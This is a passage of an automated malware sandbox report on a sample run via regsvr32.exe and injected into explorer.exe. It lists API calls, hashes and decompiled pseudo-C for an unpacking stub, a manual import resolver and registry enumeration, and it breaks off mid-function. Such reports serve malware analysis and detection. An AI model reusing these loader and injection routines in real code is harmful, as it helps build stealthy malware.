                  0x00081c21
                  0x00081c26
                  0x00081c31
                  0x00081c34
                  0x00081c3c
                  0x00081c48
                  0x00081c4b
                  0x00081c51
                  0x00081c56
                  0x00081c5b
                  0x00000000

                  APIs
                  • GetCurrentProcess.KERNEL32(0009E6EC,00000000,00000000,00000002), ref: 00081BCC
                  • GetCurrentThread.KERNEL32(00000000), ref: 00081BCF
                  • GetCurrentProcess.KERNEL32(00000000), ref: 00081BD6
                  • DuplicateHandle.KERNEL32 ref: 00081BD9
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Current$Process$DuplicateHandleThread
                  • String ID:
                  • API String ID: 3566409357-0
                  • Opcode ID: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
                  • Instruction ID: c21506e0fc88ba440ea6bcc6b6f55abd04b465cff164c1f0cab10b664a380183
                  • Opcode Fuzzy Hash: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
                  • Instruction Fuzzy Hash: F13184716043519FF704FFA4EC899AA77A9FF94390B04496EF681C72A2DB389C05CB52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Analysis Process: regsvr32.exe PID: 2244 Parent PID: 2016 regsvr32.exeCOMMON

                  Execution Graph

                  Execution Coverage:2%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:0%
                  Total number of Nodes:41
                  Total number of Limit Nodes:2

                  Graph

                  execution_graph 1290 10028d00 1291 10028d1a GetSystemDirectoryW 1290->1291 1293 10028e02 VirtualProtectEx 1291->1293 1294 10028df5 1291->1294 1295 10028e3a GetSystemDirectoryW 1293->1295 1294->1293 1297 10028f59 1295->1297 1327 10029240 1328 1002927c GetWindowsDirectoryW 1327->1328 1330 10029341 1328->1330 1331 10029660 GetProcessHeap RtlAllocateHeap 1332 1002969c 1331->1332 1337 10029b30 GetWindowsDirectoryW 1338 10029bc0 FindFirstChangeNotificationW 1337->1338 1339 10029bab 1337->1339 1340 10029bf3 1338->1340 1339->1338 1333 10028ef6 1334 10028f00 GetSystemDirectoryW 1333->1334 1336 10028f59 1334->1336 1298 10077380 1300 1007738a 1298->1300 1301 100773ab 1300->1301 1303 1007792e 1301->1303 1304 10077973 1303->1304 1305 10077a0f VirtualAlloc 1304->1305 1306 100779d1 VirtualAlloc 1304->1306 1307 10077a55 1305->1307 1306->1305 1308 10077a6e VirtualAlloc 1307->1308 1323 100775dd 1308->1323 1311 10077ad7 1312 10077ba8 VirtualProtect 1311->1312 1313 10077bc7 1312->1313 1315 10077bfa 1312->1315 1314 10077bd5 VirtualProtect 1313->1314 1313->1315 1314->1313 1316 10077c7c VirtualProtect 1315->1316 1317 10077cb7 VirtualProtect 1316->1317 1319 10077d14 VirtualFree GetPEB 1317->1319 1320 10077d40 1319->1320 1325 1007785d GetPEB 1320->1325 1322 10077d84 1324 100775ec VirtualFree 1323->1324 1324->1311 1326 1007788d 1325->1326 1326->1322

                  Executed Functions

                  Function 1007792E, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • VirtualAlloc.KERNEL32(00000000,00000814,00003000,00000040,00000814,10077380), ref: 100779EB
                  • VirtualAlloc.KERNEL32(00000000,000004CA,00003000,00000040,100773E0), ref: 10077A22
                  • VirtualAlloc.KERNEL32(00000000,00028122,00003000,00000040), ref: 10077A82
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077AB8
                  • VirtualProtect.KERNEL32(10000000,00000000,00000004,1007790D), ref: 10077BBD
                  • VirtualProtect.KERNEL32(10000000,00001000,00000004,1007790D), ref: 10077BE4
                  • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D), ref: 10077CB1
                  • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D,?), ref: 10077D07
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077D23
                  Memory Dump Source
                  • Source File: 00000009.00000002.552120596.0000000010077000.00000040.00020000.sdmp, Offset: 10077000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_10077000_regsvr32.jbxd
                  Similarity
                  • API ID: Virtual$Protect$Alloc$Free
                  • String ID:
                  • API String ID: 2574235972-0
                  • Opcode ID: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
                  • Instruction ID: e61e719fcc5ffd65f3e7435c319bc58e36d786470a44bd70215d6a9d31556276
                  • Opcode Fuzzy Hash: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
                  • Instruction Fuzzy Hash: F8D18D767086009FDB11CF14C8C0B927BA6FF8C750B194599ED6D9F25AD7B4B810CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 10028D00, Relevance: 4.8, APIs: 3, Instructions: 254COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 62 10028d00-10028d18 63 10028d36 62->63 64 10028d1a-10028d34 62->64 65 10028d3c-10028d4d 63->65 64->65 66 10028d6b-10028d72 65->66 67 10028d4f-10028d69 65->67 68 10028d78-10028d9f 66->68 67->68 69 10028da1-10028db4 68->69 70 10028db6-10028dc6 68->70 71 10028dcc-10028df3 GetSystemDirectoryW 69->71 70->71 72 10028e02-10028e38 VirtualProtectEx 71->72 73 10028df5-10028dfd 71->73 74 10028e54-10028e85 72->74 75 10028e3a-10028e4e 72->75 73->72 76 10028ea0-10028ec3 74->76 77 10028e87-10028e9b 74->77 75->74 78 10028ec5-10028eda 76->78 79 10028edd-10028ef4 76->79 77->76 78->79 80 10028f00-10028f0b 79->80 81 10028f34-10028f57 GetSystemDirectoryW 80->81 82 10028f0d-10028f2a 80->82 84 10028f75-10028fc0 81->84 85 10028f59-10028f6f 81->85 82->81 83 10028f2c-10028f32 82->83 83->80 83->81 87 10028fc5-10028fc9 84->87 85->84 88 10028fcb-10028fe5 87->88 89 10028fef 87->89 90 10028ff2-10029003 88->90 91 10028fe7-10028fed 88->91 89->90 92 10029005-10029015 90->92 93 10029018-1002902c 90->93 91->87 91->89 92->93 94 10029030-10029039 93->94 95 1002903b-10029057 94->95 96 10029059-1002908b 94->96 95->94 95->96 97 10029090-1002909b 96->97 98 100290cb-100290d4 97->98 99 1002909d-100290c1 97->99 99->98 100 100290c3-100290c9 99->100 100->97 100->98
                  APIs
                  • GetSystemDirectoryW.KERNEL32(10076908,00000744), ref: 10028DE1
                  • VirtualProtectEx.KERNEL32(000000FF,101159C8,000051F0,00000040,10114064), ref: 10028E25
                  Memory Dump Source
                  • Source File: 00000009.00000002.552028528.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_10021000_regsvr32.jbxd
                  Similarity
                  • API ID: DirectoryProtectSystemVirtual
                  • String ID:
                  • API String ID: 648172718-0
                  • Opcode ID: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
                  • Instruction ID: 8567422235b8483302f276b06f5c76c9c9f5ec01d0adbca6e2a98c3bb5a49452
                  • Opcode Fuzzy Hash: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
                  • Instruction Fuzzy Hash: 6AA1D435A046F14FE7349B388DD81E83FB2EB99312B59476AD4C4A72A5D2BE4CC4CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Function 10029B30, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 101 10029b30-10029ba9 GetWindowsDirectoryW 102 10029bc0-10029bf1 FindFirstChangeNotificationW 101->102 103 10029bab-10029bb9 101->103 104 10029bf3-10029c06 102->104 105 10029c08-10029c26 102->105 103->102 106 10029c29-10029c30 104->106 105->106 107 10029c32-10029c37 106->107 108 10029c3b-10029c6f 106->108 107->108 110 10029c74-10029c7d 108->110 111 10029c9b-10029cab 110->111 112 10029c7f-10029c99 110->112 113 10029cbc-10029cbe 111->113 114 10029cad-10029cb7 111->114 112->110 112->111 115 10029cc0-10029cd5 113->115 116 10029cd7-10029cec 113->116 114->113 115->116 118 10029cf1-10029cfa 116->118 119 10029d18-10029d47 118->119 120 10029cfc-10029d16 118->120 120->118 120->119
                  APIs
                  • GetWindowsDirectoryW.KERNEL32 ref: 10029B87
                  • FindFirstChangeNotificationW.KERNEL32(10114AA8,00000000,00000020), ref: 10029BD2
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.552028528.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_10021000_regsvr32.jbxd
                  Similarity
                  • API ID: ChangeDirectoryFindFirstNotificationWindows
                  • String ID: 1
                  • API String ID: 3662519435-2212294583
                  • Opcode ID: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
                  • Instruction ID: a17468885719ca7b42c6c3de4681764e2a8d7b2457ed512f777c56a051c8a142
                  • Opcode Fuzzy Hash: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
                  • Instruction Fuzzy Hash: 3851CF72A043A08FE335CF28CCC85D677E1EB88302F21472ED58597295D6BAAC85CB81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Analysis Process: regsvr32.exe PID: 2600 Parent PID: 2032 regsvr32.exeCOMMON

                  Executed Functions

                  Function 1007792E, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • VirtualAlloc.KERNEL32(00000000,00000814,00003000,00000040,00000814,10077380), ref: 100779EB
                  • VirtualAlloc.KERNEL32(00000000,000004CA,00003000,00000040,100773E0), ref: 10077A22
                  • VirtualAlloc.KERNEL32(00000000,00028122,00003000,00000040), ref: 10077A82
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077AB8
                  • VirtualProtect.KERNEL32(10000000,00000000,00000004,1007790D), ref: 10077BBD
                  • VirtualProtect.KERNEL32(10000000,00001000,00000004,1007790D), ref: 10077BE4
                  • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D), ref: 10077CB1
                  • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D,?), ref: 10077D07
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077D23
                  Memory Dump Source
                  • Source File: 0000000C.00000002.563409743.0000000010077000.00000040.00020000.sdmp, Offset: 10077000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_10077000_regsvr32.jbxd
                  Similarity
                  • API ID: Virtual$Protect$Alloc$Free
                  • String ID:
                  • API String ID: 2574235972-0
                  • Opcode ID: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
                  • Instruction ID: e61e719fcc5ffd65f3e7435c319bc58e36d786470a44bd70215d6a9d31556276
                  • Opcode Fuzzy Hash: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
                  • Instruction Fuzzy Hash: F8D18D767086009FDB11CF14C8C0B927BA6FF8C750B194599ED6D9F25AD7B4B810CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 10028D00, Relevance: 4.8, APIs: 3, Instructions: 254COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 62 10028d00-10028d18 63 10028d36 62->63 64 10028d1a-10028d34 62->64 65 10028d3c-10028d4d 63->65 64->65 66 10028d6b-10028d72 65->66 67 10028d4f-10028d69 65->67 68 10028d78-10028d9f 66->68 67->68 69 10028da1-10028db4 68->69 70 10028db6-10028dc6 68->70 71 10028dcc-10028df3 GetSystemDirectoryW 69->71 70->71 72 10028e02-10028e38 VirtualProtectEx 71->72 73 10028df5-10028dfd 71->73 74 10028e54-10028e85 72->74 75 10028e3a-10028e4e 72->75 73->72 76 10028ea0-10028ec3 74->76 77 10028e87-10028e9b 74->77 75->74 78 10028ec5-10028eda 76->78 79 10028edd-10028ef4 76->79 77->76 78->79 80 10028f00-10028f0b 79->80 81 10028f34-10028f57 GetSystemDirectoryW 80->81 82 10028f0d-10028f2a 80->82 84 10028f75-10028fc0 81->84 85 10028f59-10028f6f 81->85 82->81 83 10028f2c-10028f32 82->83 83->80 83->81 87 10028fc5-10028fc9 84->87 85->84 88 10028fcb-10028fe5 87->88 89 10028fef 87->89 90 10028ff2-10029003 88->90 91 10028fe7-10028fed 88->91 89->90 92 10029005-10029015 90->92 93 10029018-1002902c 90->93 91->87 91->89 92->93 94 10029030-10029039 93->94 95 1002903b-10029057 94->95 96 10029059-1002908b 94->96 95->94 95->96 97 10029090-1002909b 96->97 98 100290cb-100290d4 97->98 99 1002909d-100290c1 97->99 99->98 100 100290c3-100290c9 99->100 100->97 100->98
                  APIs
                  • GetSystemDirectoryW.KERNEL32(10076908,00000744), ref: 10028DE1
                  • VirtualProtectEx.KERNEL32(000000FF,101159C8,000051F0,00000040,10114064), ref: 10028E25
                  Memory Dump Source
                  • Source File: 0000000C.00000002.563376614.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_10021000_regsvr32.jbxd
                  Similarity
                  • API ID: DirectoryProtectSystemVirtual
                  • String ID:
                  • API String ID: 648172718-0
                  • Opcode ID: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
                  • Instruction ID: 8567422235b8483302f276b06f5c76c9c9f5ec01d0adbca6e2a98c3bb5a49452
                  • Opcode Fuzzy Hash: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
                  • Instruction Fuzzy Hash: 6AA1D435A046F14FE7349B388DD81E83FB2EB99312B59476AD4C4A72A5D2BE4CC4CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Function 10029B30, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 101 10029b30-10029ba9 GetWindowsDirectoryW 102 10029bc0-10029bf1 FindFirstChangeNotificationW 101->102 103 10029bab-10029bb9 101->103 104 10029bf3-10029c06 102->104 105 10029c08-10029c26 102->105 103->102 106 10029c29-10029c30 104->106 105->106 107 10029c32-10029c37 106->107 108 10029c3b-10029c6f 106->108 107->108 110 10029c74-10029c7d 108->110 111 10029c9b-10029cab 110->111 112 10029c7f-10029c99 110->112 113 10029cbc-10029cbe 111->113 114 10029cad-10029cb7 111->114 112->110 112->111 115 10029cc0-10029cd5 113->115 116 10029cd7-10029cec 113->116 114->113 115->116 118 10029cf1-10029cfa 116->118 119 10029d18-10029d47 118->119 120 10029cfc-10029d16 118->120 120->118 120->119
                  APIs
                  • GetWindowsDirectoryW.KERNEL32 ref: 10029B87
                  • FindFirstChangeNotificationW.KERNEL32(10114AA8,00000000,00000020), ref: 10029BD2
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.563376614.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_10021000_regsvr32.jbxd
                  Similarity
                  • API ID: ChangeDirectoryFindFirstNotificationWindows
                  • String ID: 1
                  • API String ID: 3662519435-2212294583
                  • Opcode ID: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
                  • Instruction ID: a17468885719ca7b42c6c3de4681764e2a8d7b2457ed512f777c56a051c8a142
                  • Opcode Fuzzy Hash: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
                  • Instruction Fuzzy Hash: 3851CF72A043A08FE335CF28CCC85D677E1EB88302F21472ED58597295D6BAAC85CB81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Analysis Process: explorer.exe PID: 2180 Parent PID: 2244 explorer.exeCOMMON

                  Executed Functions

                  Function 0008CF84, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 94%
                  			E0008CF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x9e688; // 0xb0000
				GetCurrentProcess();
				_t11 = E0008BA05(); // executed
				_t1 = _t29 + 0x1644; // 0xb1644
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E00088FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0xb0228
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E00088FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E0008E3B6(_t3);
				_t7 = _t29 + 0x220; // 0xb0220
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E0008E3F1(_t7); // executed
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}








                  0x0008cf87
                  0x0008cf89
                  0x0008cf90
                  0x0008cf98
                  0x0008cfa2
                  0x0008cfa2
                  0x0008cfa8
                  0x0008cfb1
                  0x0008cfb7
                  0x0008cfb9
                  0x0008cfbd
                  0x0008cfbd
                  0x0008cfc2
                  0x0008cfc8
                  0x0008cfd8
                  0x0008cfe2
                  0x0008cfea
                  0x0008cfed
                  0x0008cff9
                  0x0008cfff
                  0x0008d004
                  0x0008d00a
                  0x0008d010
                  0x0008d016
                  0x0008d01e

                  APIs
                  • GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
                  • GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
                  • memset.MSVCRT ref: 0008CFE2
                  • GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
                  • GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CurrentProcess$FileModuleNameVersionmemset
                  • String ID:
                  • API String ID: 3581039275-0
                  • Opcode ID: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
                  • Instruction ID: 1cd3ccc896d32ed381cc1e7efd68f96a46d511454c8c9de3dc1a9453bb6438f5
                  • Opcode Fuzzy Hash: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
                  • Instruction Fuzzy Hash: C4015E70901700ABE720BF70D84AADAB7E5FF85310F04082EF59683292EF746545CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0009249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 12 9249b-924a9 13 924ab-924ae 12->13 14 924b3-924f3 GetModuleHandleA call 8e099 12->14 15 92660-92661 13->15 18 924f9-92510 14->18 19 9265e 14->19 20 92513-9251a 18->20 19->15 21 9251c-92525 20->21 22 92527-92537 20->22 21->20 23 9253a-92541 22->23 23->19 24 92547-9255e LoadLibraryA 23->24 25 92568-9256e 24->25 26 92560-92563 24->26 27 9257d-92586 25->27 28 92570-9257b 25->28 26->15 29 92589 27->29 28->29 30 9258d-92593 29->30 31 92599-925b1 30->31 32 92650-92659 30->32 33 925b3-925d2 31->33 34 925d4-92602 31->34 32->23 37 92605-9260b 33->37 34->37 38 92639-9264b 37->38 39 9260d-9261b 37->39 38->30 40 9261d-9262f 39->40 41 92631-92637 39->41 40->38 41->38
                  C-Code - Quality: 50%
                  			E0009249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				struct HINSTANCE__* _t121;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E0008E099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
						_v36 = _t121;
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}























                  0x000924a1
                  0x000924a9
                  0x000924be
                  0x000924d0
                  0x000924dc
                  0x000924e2
                  0x000924e7
                  0x000924f3
                  0x0009265e
                  0x00000000
                  0x0009265e
                  0x000924f9
                  0x00092502
                  0x00092510
                  0x00092513
                  0x00092522
                  0x00092522
                  0x00092529
                  0x00092537
                  0x0009253a
                  0x00092551
                  0x00092557
                  0x0009255e
                  0x0009256e
                  0x00092586
                  0x00092570
                  0x00092578
                  0x00092578
                  0x00092589
                  0x0009258d
                  0x00092599
                  0x0009259d
                  0x000925a1
                  0x000925a5
                  0x000925b1
                  0x000925dc
                  0x000925e4
                  0x000925f6
                  0x00092602
                  0x000925b3
                  0x000925b8
                  0x000925c3
                  0x000925cf
                  0x000925cf
                  0x0009260b
                  0x00092611
                  0x0009261b
                  0x00092637
                  0x0009261d
                  0x0009262c
                  0x0009262c
                  0x0009261b
                  0x0009263f
                  0x00092648
                  0x00092648
                  0x00092656
                  0x00000000
                  0x00092656
                  0x00092562
                  0x00000000
                  0x00092562
                  0x00000000
                  0x0009253a
                  0x00000000

                  APIs
                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000924B8
                  • LoadLibraryA.KERNEL32(00000000), ref: 00092551
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: HandleLibraryLoadModule
                  • String ID: GetProcAddress$kernel32.dll
                  • API String ID: 4133054770-1584408056
                  • Opcode ID: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
                  • Instruction ID: 665fec345cac807b649f43962df39f6cef8ef0a689833b3db65f34db15b36259
                  • Opcode Fuzzy Hash: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
                  • Instruction Fuzzy Hash: F6617B75900209EFDF50CF98D885BADBBF1BF08315F258599E815AB3A1C774AA80EF50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000861B4, Relevance: 6.1, APIs: 4, Instructions: 145registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 42 861b4-861f9 memset call 88604 45 861ff-86211 call 88604 42->45 46 86363-86369 42->46 45->46 49 86217-86234 RegOpenKeyExW 45->49 50 8623a-8626d 49->50 51 86333-86337 49->51 57 8627f-86284 50->57 58 8626f-8627a 50->58 52 86339-8633e 51->52 53 86344-86360 call 8861a * 2 51->53 52->53 53->46 57->51 59 8628a 57->59 58->51 61 8628d-862dc memset * 2 59->61 65 862de-862ee 61->65 66 86326-8632d 61->66 68 862f0-86304 65->68 69 86323 65->69 66->51 66->61 68->69 71 86306-86313 call 8c392 68->71 69->66 74 8631c-8631e call 8b1b1 71->74 75 86315-86317 71->75 74->69 75->74
                  C-Code - Quality: 80%
                  			E000861B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v56;
				void _v576;
				intOrPtr _t63;
				intOrPtr _t72;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				signed int _t85;
				intOrPtr _t87;
				int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t108;

				_t108 = __fp0;
				_t96 = __edx;
				_t89 = 0;
				_v8 = 0;
				memset( &_v576, 0, 0x208);
				_v28 = 0x104;
				_v20 = 0x3fff;
				_v16 = 0;
				_t98 = E00088604(0x3fff);
				_t100 = _t99 + 0x10;
				_v32 = _t98;
				if(_t98 == 0) {
					L18:
					return 0;
				}
				_t97 = E00088604(0x800);
				_v36 = _t97;
				if(_t97 == 0) {
					goto L18;
				}
				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
					L15:
					if(_v8 != 0) {
						_t63 =  *0x9e68c; // 0x293fab8
						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
					}
					E0008861A( &_v32, 0x3fff);
					E0008861A( &_v36, 0x800);
					goto L18;
				}
				_push( &_v56);
				_push( &_v40);
				_push( &_v44);
				_push( &_v48);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v28);
				_push( &_v576);
				_t72 =  *0x9e68c; // 0x293fab8
				_push(_v8);
				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
					__eflags = _v24;
					if(_v24 == 0) {
						goto L15;
					}
					_v12 = 0;
					do {
						memset(_t97, 0, 0x800);
						memset(_t98, 0, 0x3fff);
						_t100 = _t100 + 0x18;
						_v20 = 0x3fff;
						_v16 = 0x800;
						 *_t98 = 0;
						_t80 =  *0x9e68c; // 0x293fab8
						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
						__eflags = _t81;
						if(_t81 == 0) {
							_t82 =  *0x9e690; // 0x293fb90
							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
							__eflags = _t90;
							if(_t90 != 0) {
								_t92 =  *0x9e68c; // 0x293fab8
								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
								__eflags = _a16;
								if(_a16 != 0) {
									_t85 = E0008C392(_t90);
									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
									if(__eflags == 0) {
										__eflags = 0;
										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
									}
									E0008B1B1(_t90, _t96, __eflags, _t108);
								}
							}
							_t89 = _v12;
						}
						_t89 = _t89 + 1;
						_v12 = _t89;
						__eflags = _t89 - _v24;
					} while (_t89 < _v24);
					goto L15;
				}
				_t87 =  *0x9e68c; // 0x293fab8
				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
				goto L15;
			}
































                  0x000861b4
                  0x000861b4
                  0x000861c0
                  0x000861cf
                  0x000861d2
                  0x000861dc
                  0x000861e4
                  0x000861e7
                  0x000861ef
                  0x000861f1
                  0x000861f4
                  0x000861f9
                  0x00086365
                  0x00086369
                  0x00086369
                  0x00086209
                  0x0008620b
                  0x00086211
                  0x00000000
                  0x00000000
                  0x00086234
                  0x00086333
                  0x00086337
                  0x00086339
                  0x00086341
                  0x00086341
                  0x0008634d
                  0x0008635b
                  0x00000000
                  0x00086360
                  0x0008623d
                  0x00086241
